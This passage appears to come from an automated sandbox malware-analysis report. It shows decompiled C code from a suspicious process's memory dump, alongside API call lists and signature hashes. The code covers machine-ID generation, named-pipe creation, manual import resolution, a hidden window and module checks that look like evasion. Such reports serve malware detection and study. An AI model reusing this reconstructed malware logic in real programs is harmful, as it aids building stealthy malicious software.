							E0008861A( &_v1112, _t192);
							_t81 = 1;
							goto L42;
						}
						_t116 =  *(_t75 + 0x1898);
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E0008E286(_v1112, _t175); // executed
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E000895E1(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E0008BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E000885D5( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E00082BA4( &_v1044, _t192, 0x105); // executed
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}

0x00084a0b
0x00084a18
0x00084a23
0x00084a28
0x00084a2a
0x00084a2d
0x00084a32
0x00084a35
0x00084a3f
0x00084a41
0x00084a4e
0x00084a57
0x00084a57
0x00084a64
0x00084a7f
0x00084a86
0x00084a88
0x00084a8d
0x00084a92
0x00084a98
0x00084aa7
0x00084ac6
0x00084ac8
0x00084ace
0x00084ad4
0x00084ad9
0x00084add
0x00084ae0
0x00084aea
0x00084aec
0x00084aed
0x00084af8
0x00084afa
0x00084afd
0x00084b02
0x00084b09
0x00084b5e
0x00084b5e
0x00084b63
0x00084bca
0x00084bcf
0x00084bd1
0x00084bdb
0x00084be0
0x00084be0
0x00084bf5
0x00084bfa
0x00084bfc
0x00084bff
0x00084c01
0x00000000
0x00000000
0x00084c07
0x00084c11
0x00084c1a
0x00084c1f
0x00084c22
0x00084c28
0x00084c2e
0x00084c36
0x00084c38
0x00084c3b
0x00084c3c
0x00084c41
0x00084c44
0x00084c47
0x00084c49
0x00084c4d
0x00084c4d
0x00084c52
0x00084c55
0x00084c57
0x00084c5b
0x00084c5b
0x00084c62
0x00084c67
0x00084c69
0x00084c6d
0x00084c6f
0x00084c75
0x00084c79
0x00084c7c
0x00084c7d
0x00084c82
0x00084c85
0x00084c8a
0x00084cb2
0x00084cb8
0x00084cbf
0x00084cce
0x00084cd3
0x00000000
0x00084cd3
0x00084cc1
0x00000000
0x00084c8c
0x00084c8c
0x00084c91
0x00084c98
0x00084cdd
0x00084cdd
0x00084ce4
0x00084ce8
0x00084ce9
0x00084ce9
0x00084cf3
0x00084cf8
0x00084cfb
0x00084cfc
0x00084cfe
0x00084d00
0x00084d05
0x00084d0c
0x00084d4f
0x00084d0e
0x00084d13
0x00084d1b
0x00084d1f
0x00084d2a
0x00084d35
0x00084d3d
0x00084d41
0x00084d49
0x00084d49
0x00084d0c
0x00084d55
0x00084d58
0x00084d5a
0x00084d60
0x00084d60
0x00084d62
0x00084d62
0x00000000
0x00084d62
0x00084c9a
0x00084c9a
0x00084ca0
0x00084ca2
0x00084ca7
0x00084ca7
0x00084ca9
0x00084cd8
0x00000000
0x00084cd8
0x00084cab
0x00084ae4
0x00084ae4
0x00000000
0x00084ae4
0x00084c8a
0x00084b69
0x00084b77
0x00084b8f
0x00084b95
0x00084b97
0x00084baf
0x00084bb4
0x00084bbd
0x00084bc3
0x00000000
0x00084bc3
0x00084b9f
0x00084ba8
0x00000000
0x00084ba8
0x00084b0b
0x00084b11
0x00084b13
0x00084b51
0x00084b53
0x00000000
0x00000000
0x00084b55
0x00084b59
0x00000000
0x00084b59
0x00084b15
0x00084b1f
0x00084b2b
0x00084b36
0x00084b3d
0x00084b47
0x00084b4c
0x00000000
0x00084b4c
0x00084ae2
0x00000000
0x00084a66
0x00084a71
0x00084a77
0x00084a79
0x00084d64
0x00084d64
0x00084d66
0x00084d6c
0x00084d6c
0x00000000
0x00084a79

APIs

memset.MSVCRT ref: 00084A2D
CreateNamedPipeA.KERNEL32(00000000,00080003,00000006,000000FF,00000400,00000400,00000000,00000000), ref: 00084B8F
lstrcpyW.KERNEL32(00000000,00000000), ref: 00084D1F
lstrcatW.KERNEL32 ref: 00084D3D
lstrcatW.KERNEL32 ref: 00084D41
lstrcatW.KERNEL32 ref: 00084D49
lstrcpyW.KERNEL32(00000000,00000000), ref: 00084D4F

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$lstrcpy$CreateNamedPipememset
String ID:
API String ID: 2307407751-0
Opcode ID: c5e3f3734ff40b9b32b5f53794db4090d90e5f77e8c3d0d72d8dc6ffaebd0e71
Instruction ID: dec47ca1d8cbe9d9e50b353cb195f6a6744e81453b5205875f33d8479ea457cb
Opcode Fuzzy Hash: c5e3f3734ff40b9b32b5f53794db4090d90e5f77e8c3d0d72d8dc6ffaebd0e71
Instruction Fuzzy Hash: FC919E71604302AFE754FB24DC86FBA73E9BB84720F14452EF5958B292EB74DD048B92

Uniqueness

Uniqueness Score: -1.00%

Function 0008B7A8, Relevance: 9.1, APIs: 6, Instructions: 83
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0008B7A8(WCHAR* __ecx, void* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				GetComputerNameW( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E000895E1(_t44, 0xa88);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E000885D5( &_v16);
				_t33 = E0008C392(_t43);
				E00089640( &(_t43[E0008C392(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E0008C392(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E0008D400(_t43, E0008C392(_t43) + _t40, 0);
			}

0x0008b7a8
0x0008b7b1
0x0008b7bd
0x0008b7c3
0x0008b7c5
0x0008b7cd
0x0008b7e0
0x0008b7ef
0x0008b7fa
0x0008b807
0x0008b821
0x0008b826
0x0008b828
0x0008b82f
0x0008b83f
0x0008b850
0x0008b85a
0x0008b862
0x0008b869
0x0008b86c
0x0008b889

APIs

memset.MSVCRT ref: 0008B7C5
GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 0008B7E0
lstrcpynW.KERNEL32(?,?,00000100), ref: 0008B7EF
GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0008B821

Part of subcall function 00089640: _vsnwprintf.MSVCRT ref: 0008965D

lstrcatW.KERNEL32 ref: 0008B85A
CharUpperBuffW.USER32(?,00000000), ref: 0008B86C

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
String ID:
API String ID: 3410906232-0
Opcode ID: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
Instruction ID: 8115248732dee6e15747b0cfab76d271734f3ac179cb7c14a2a6e9e989f043a1
Opcode Fuzzy Hash: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
Instruction Fuzzy Hash: F82156B2A00214BFE714BBA4DC4AFEE77BCFB85310F108566B505E6182EE755F088B60

Uniqueness

Uniqueness Score: -1.00%

Function 0008CF84, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0008CF84(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0x9e688; // 0xf0000
				GetCurrentProcess();
				_t11 = E0008BA05(); // executed
				_t1 = _t29 + 0x1644; // 0xf1644
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E00088FBE(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0xf0228
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E00088FBE(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E0008E3B6(_t3);
				_t7 = _t29 + 0x220; // 0xf0220
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E0008E3F1(_t7); // executed
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}

0x0008cf87
0x0008cf89
0x0008cf90
0x0008cf98
0x0008cfa2
0x0008cfa2
0x0008cfa8
0x0008cfb1
0x0008cfb7
0x0008cfb9
0x0008cfbd
0x0008cfbd
0x0008cfc2
0x0008cfc8
0x0008cfd8
0x0008cfe2
0x0008cfea
0x0008cfed
0x0008cff9
0x0008cfff
0x0008d004
0x0008d00a
0x0008d010
0x0008d016
0x0008d01e

APIs

GetCurrentProcess.KERNEL32(?,?,000F0000,?,00083545), ref: 0008CF90
GetModuleFileNameW.KERNEL32(00000000,000F1644,00000105,?,?,000F0000,?,00083545), ref: 0008CFB1
memset.MSVCRT ref: 0008CFE2
GetVersionExA.KERNEL32(000F0000,000F0000,?,00083545), ref: 0008CFED
GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CurrentProcess$FileModuleNameVersionmemset
String ID:
API String ID: 3581039275-0
Opcode ID: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
Instruction ID: 1cd3ccc896d32ed381cc1e7efd68f96a46d511454c8c9de3dc1a9453bb6438f5
Opcode Fuzzy Hash: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
Instruction Fuzzy Hash: C4015E70901700ABE720BF70D84AADAB7E5FF85310F04082EF59683292EF746545CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0009249B, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151
libraryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0009249B(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				struct HINSTANCE__* _t121;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E0008E099(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
						_v36 = _t121;
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}

0x000924a1
0x000924a9
0x000924be
0x000924d0
0x000924dc
0x000924e2
0x000924e7
0x000924f3
0x0009265e
0x00000000
0x0009265e
0x000924f9
0x00092502
0x00092510
0x00092513
0x00092522
0x00092522
0x00092529
0x00092537
0x0009253a
0x00092551
0x00092557
0x0009255e
0x0009256e
0x00092586
0x00092570
0x00092578
0x00092578
0x00092589
0x0009258d
0x00092599
0x0009259d
0x000925a1
0x000925a5
0x000925b1
0x000925dc
0x000925e4
0x000925f6
0x00092602
0x000925b3
0x000925b8
0x000925c3
0x000925cf
0x000925cf
0x0009260b
0x00092611
0x0009261b
0x00092637
0x0009261d
0x0009262c
0x0009262c
0x0009261b
0x0009263f
0x00092648
0x00092648
0x00092656
0x00000000
0x00092656
0x00092562
0x00000000
0x00092562
0x00000000
0x0009253a
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000924B8
LoadLibraryA.KERNEL32(00000000), ref: 00092551

Strings

GetProcAddress, xrefs: 000924C1
kernel32.dll, xrefs: 000924B3

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID: GetProcAddress$kernel32.dll
API String ID: 4133054770-1584408056
Opcode ID: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
Instruction ID: 665fec345cac807b649f43962df39f6cef8ef0a689833b3db65f34db15b36259
Opcode Fuzzy Hash: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
Instruction Fuzzy Hash: F6617B75900209EFDF50CF98D885BADBBF1BF08315F258599E815AB3A1C774AA80EF50

Uniqueness

Uniqueness Score: -1.00%

Function 00082EDA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00082EDA(void* __eflags) {
				CHAR* _v12;
				struct HINSTANCE__* _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				void _v52;
				char _v80;
				char _v144;
				intOrPtr _t25;
				intOrPtr _t32;
				struct HWND__* _t34;
				intOrPtr _t36;
				intOrPtr _t39;
				struct HWND__* _t44;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t51;
				intOrPtr _t53;
				intOrPtr _t56;
				intOrPtr _t59;
				struct HINSTANCE__* _t64;

				_t25 =  *0x9e684; // 0x12af8f0
				_t64 =  *((intOrPtr*)(_t25 + 0x10))(0);
				memset( &_v52, 0, 0x30);
				_t59 =  *0x9e688; // 0xf0000
				E0008902D(1,  &_v144, 0x1e, 0x32, _t59 + 0x648);
				_v48 = 3;
				_v52 = 0x30;
				_v12 =  &_v144;
				_v44 = E00082E77;
				_push( &_v52);
				_t32 =  *0x9e694; // 0x12afa48
				_v32 = _t64;
				if( *((intOrPtr*)(_t32 + 8))() == 0) {
					L6:
					_t34 =  *0x9e718; // 0x30094
					if(_t34 != 0) {
						_t39 =  *0x9e694; // 0x12afa48
						 *((intOrPtr*)(_t39 + 0x28))(_t34);
					}
					L8:
					_t36 =  *0x9e694; // 0x12afa48
					 *((intOrPtr*)(_t36 + 0x2c))( &_v144, _t64);
					return 0;
				}
				_t44 = CreateWindowExA(0,  &_v144,  &_v144, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, _t64, 0);
				 *0x9e718 = _t44;
				if(_t44 == 0) {
					goto L8;
				}
				ShowWindow(_t44, 0);
				_t47 =  *0x9e694; // 0x12afa48
				 *((intOrPtr*)(_t47 + 0x18))( *0x9e718);
				while(1) {
					_t50 =  *0x9e694; // 0x12afa48
					_t51 =  *((intOrPtr*)(_t50 + 0x1c))( &_v80, 0, 0, 0);
					if(_t51 == 0) {
						goto L6;
					}
					if(_t51 == 0xffffffff) {
						goto L6;
					}
					_t53 =  *0x9e694; // 0x12afa48
					 *((intOrPtr*)(_t53 + 0x20))( &_v80);
					_t56 =  *0x9e694; // 0x12afa48
					 *((intOrPtr*)(_t56 + 0x24))( &_v80);
				}
				goto L6;
			}

0x00082ee3
0x00082ef2
0x00082ef9
0x00082efe
0x00082f18
0x00082f20
0x00082f2d
0x00082f34
0x00082f3a
0x00082f41
0x00082f42
0x00082f47
0x00082f50
0x00082fcd
0x00082fcd
0x00082fd4
0x00082fd7
0x00082fdc
0x00082fdc
0x00082fdf
0x00082fe7
0x00082fec
0x00082ff4
0x00082ff4
0x00082f77
0x00082f7a
0x00082f81
0x00000000
0x00000000
0x00082f8a
0x00082f8d
0x00082f98
0x00082fba
0x00082fc1
0x00082fc6
0x00082fcb
0x00000000
0x00000000
0x00082fa0
0x00000000
0x00000000
0x00082fa6
0x00082fab
0x00082fb2
0x00082fb7
0x00082fb7
0x00000000

APIs

memset.MSVCRT ref: 00082EF9
CreateWindowExA.USER32(00000000,?,?,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 00082F77
ShowWindow.USER32(00000000,00000000), ref: 00082F8A

Strings

0, xrefs: 00082F2D

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: Window$CreateShowmemset
String ID: 0
API String ID: 3027179219-4108050209
Opcode ID: 003fa740151e0862398a7cbc69c8fa257132a5db8a09b7656452763574cb2ca0
Instruction ID: 213deb34b0e2dc67e2747e7ce6682629aec82146620f961571f6702d7269f10e
Opcode Fuzzy Hash: 003fa740151e0862398a7cbc69c8fa257132a5db8a09b7656452763574cb2ca0
Instruction Fuzzy Hash: A93106B2500118AFF710EFA8DC89EAA7BBCFB18384F004066B649D72A2D634DD04CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00084D6D, Relevance: 6.4, APIs: 4, Instructions: 432
stringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00084D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t119;
				void* _t120;
				signed int _t122;
				intOrPtr _t123;
				CHAR* _t124;
				intOrPtr _t125;
				CHAR* _t127;
				WCHAR* _t130;
				intOrPtr _t133;
				intOrPtr _t137;
				WCHAR* _t138;
				intOrPtr _t142;
				WCHAR* _t143;
				CHAR* _t144;
				intOrPtr _t145;
				intOrPtr _t150;
				intOrPtr _t153;
				WCHAR* _t154;
				signed int _t159;
				WCHAR* _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed int _t178;
				intOrPtr _t182;
				WCHAR* _t184;
				char _t186;
				WCHAR* _t188;
				intOrPtr _t200;
				intOrPtr _t211;
				signed int _t215;
				char _t220;
				WCHAR* _t231;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t246;
				signed int _t248;
				WCHAR* _t249;
				CHAR* _t250;
				intOrPtr _t262;
				void* _t271;
				intOrPtr _t272;
				signed int _t277;
				void* _t278;
				intOrPtr _t280;
				signed int _t282;
				void* _t298;
				void* _t299;
				intOrPtr _t305;
				CHAR* _t326;
				void* _t328;
				WCHAR* _t329;
				intOrPtr _t331;
				WCHAR* _t333;
				signed int _t335;
				intOrPtr* _t337;
				void* _t338;
				void* _t339;
				void* _t353;

				_t353 = __fp0;
				_t337 = (_t335 & 0xfffffff8) - 0x26c;
				_t119 =  *0x9e688; // 0xf0000
				_v620 = _v620 & 0x00000000;
				_t328 = __ecx;
				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
					L7:
					_t120 = E0008B7A8(0x9b9c8,  &_v516); // executed
					_t14 = _t120 + 1; // 0x1
					E0008A86D( &_v556, _t14, _t351);
					_t298 = 0x64;
					_t122 = E0008A471( &_v556, _t298);
					 *0x9e748 = _t122;
					if(_t122 != 0) {
						_push(0x4e5);
						_t299 = 0x10;
						_t123 = E0008E1BC(0x9b9cc, _t299); // executed
						 *0x9e680 = _t123;
						 *_t337 = 0x610;
						_t124 = E000895E1(0x9b9cc);
						_push(0);
						_push(_t124);
						_v612 = _t124;
						_t125 =  *0x9e688; // 0xf0000
						_t127 = E000892E5(_t125 + 0x228);
						_t338 = _t337 + 0xc;
						_v616 = _t127;
						E000885D5( &_v612);
						_t130 = E0008B269(_t127);
						_t246 = 3;
						__eflags = _t130;
						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E0008861A( &_v616, 0xfffffffe);
						_t133 =  *0x9e688; // 0xf0000
						_t22 = _t133 + 0x114; // 0xf0114
						E00084A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
						_t262 =  *0x9e688; // 0xf0000
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_v576 =  *((intOrPtr*)(_t262 + 0x214));
							_t137 =  *0x9e680; // 0x12afda0
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564); // executed
							}
							_v620 = _v620 & 0x00000000;
							E0008E2C6(_t353,  &_v576); // executed
							_pop(_t262);
							_t142 =  *0x9e6b4; // 0x12afa98
							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E0008E2C6(_t353,  &_v588);
								_t235 =  *0x9e6b4; // 0x12afa98
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0x9e73c;
							if( *0x9e73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0x9e680; // 0x12afda0
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0x9e688; // 0xf0000
								_t262 =  *((intOrPtr*)(_t166 + 0x214));
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E000849A5();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0x9e684; // 0x12af8f0
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0x9e688; // 0xf0000
											_t184 = E0008FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
											_t339 = _t339 + 0xc;
											__eflags = _t184;
											if(_t184 >= 0) {
												_t333 = E00088604(0x1000);
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
													_t186 = E0008109A(_t262, 0x148);
													_t305 =  *0x9e688; // 0xf0000
													_v636 = _t186;
													_push(_t305 + 0x648);
													_push(0xa);
													_push(7);
													_t271 = 2;
													E0008902D(_t271,  &_v572);
													_t272 =  *0x9e688; // 0xf0000
													_t188 = E000860DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
													_t339 = _t339 + 0x18;
													_v632 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														_push(_v624 % _t248 & 0x0000ffff);
														_push(_v628 & 0x0000ffff);
														_push(_v596 % _t248 & 0x0000ffff);
														_push(_v620 & 0x0000ffff);
														_push(_v632);
														_push( &_v572);
														_t200 =  *0x9e688; // 0xf0000
														__eflags = _t200 + 0x1020;
														E00089640(_t333, 0x1000, _v636, _t200 + 0x1020);
														E000885D5( &_v636);
														E0008A911(_t333, 0, 0xbb8, 1);
														E0008861A( &_v632, 0xfffffffe);
														_t339 = _t339 + 0x44;
													}
													E0008861A( &_v616, 0xfffffffe);
													_pop(_t262);
												}
											}
										}
										goto L36;
									}
									__eflags = _t262 - 2;
									if(_t262 != 2) {
										goto L36;
									}
									E000849A5();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t211 =  *0x9e684; // 0x12af8f0
									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
									_t215 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t215;
									_t277 = 0x3c;
									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
									_t249 = E00088604(0x1000);
									_v624 = _t249;
									_pop(_t278);
									__eflags = _t249;
									if(_t249 != 0) {
										_t220 = E000895E1(_t278, 0x32d);
										_t280 =  *0x9e688; // 0xf0000
										_push(_t280 + 0x228);
										_t282 = 0x3c;
										_v636 = _t220;
										_push(_v628 % _t282 & 0x0000ffff);
										E00089640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
										E000885D5( &_v636);
										E0008A911(_t249, 0, 0xbb8, 1);
										E0008861A( &_v624, 0xfffffffe);
									}
									goto L41;
								}
							}
						} else {
							_t238 =  *((intOrPtr*)(_t262 + 0x214));
							__eflags = _t238 - _t246;
							if(_t238 == _t246) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
								L36:
								_t144 = E000895E1(_t262, 0x610);
								_push(0);
								_push(_t144);
								_v616 = _t144;
								_t145 =  *0x9e688; // 0xf0000
								_t329 = E000892E5(_t145 + 0x228);
								_v612 = _t329;
								__eflags = _t329;
								if(_t329 != 0) {
									_t160 = E0008B269(_t329);
									__eflags = _t160;
									if(_t160 != 0) {
										_t163 =  *0x9e684; // 0x12af8f0
										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
									}
									E0008861A( &_v612, 0xfffffffe);
								}
								E000885D5( &_v616);
								_t150 =  *0x9e688; // 0xf0000
								lstrcpynW(_t150 + 0x438,  *0x9e740, 0x105);
								_t153 =  *0x9e688; // 0xf0000
								_t154 = _t153 + 0x228;
								__eflags = _t154;
								lstrcpynW(_t154,  *0x9e738, 0x105);
								_t331 =  *0x9e688; // 0xf0000
								_t117 = _t331 + 0x228; // 0xf0228
								 *((intOrPtr*)(_t331 + 0x434)) = E00088FBE(_t117, __eflags);
								E0008861A(0x9e740, 0xfffffffe);
								E0008861A(0x9e738, 0xfffffffe);
								L41:
								_t159 = 0;
								__eflags = 0;
								L42:
								return _t159;
							}
							__eflags = _t238 - 2;
							if(_t238 != 2) {
								goto L36;
							}
							goto L17;
						}
					}
					L8:
					_t159 = _t122 | 0xffffffff;
					goto L42;
				}
				_t250 = E000895C7(0x6e2);
				_v616 = _t250;
				_t326 = E000895C7(0x9f5);
				_v612 = _t326;
				if(_t250 != 0 && _t326 != 0) {
					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
						_v620 = 1;
					}
					E000885C2( &_v616);
					_t122 = E000885C2( &_v612);
					_t351 = _v620;
					if(_v620 != 0) {
						goto L8;
					}
				}
			}

0x00084d6d
0x00084d73
0x00084d79
0x00084d7e
0x00084d8c
0x00084d8f
0x00084dee
0x00084df7
0x00084e00
0x00084e03
0x00084e0a
0x00084e0f
0x00084e14
0x00084e1b
0x00084e25
0x00084e2c
0x00084e32
0x00084e37
0x00084e3c
0x00084e43
0x00084e49
0x00084e4b
0x00084e4c
0x00084e50
0x00084e5b
0x00084e60
0x00084e69
0x00084e6e
0x00084e76
0x00084e7d
0x00084e7e
0x00084e80
0x00084e9c
0x00084e9f
0x00084e9f
0x00084ea8
0x00084ead
0x00084ebd
0x00084ec5
0x00084eca
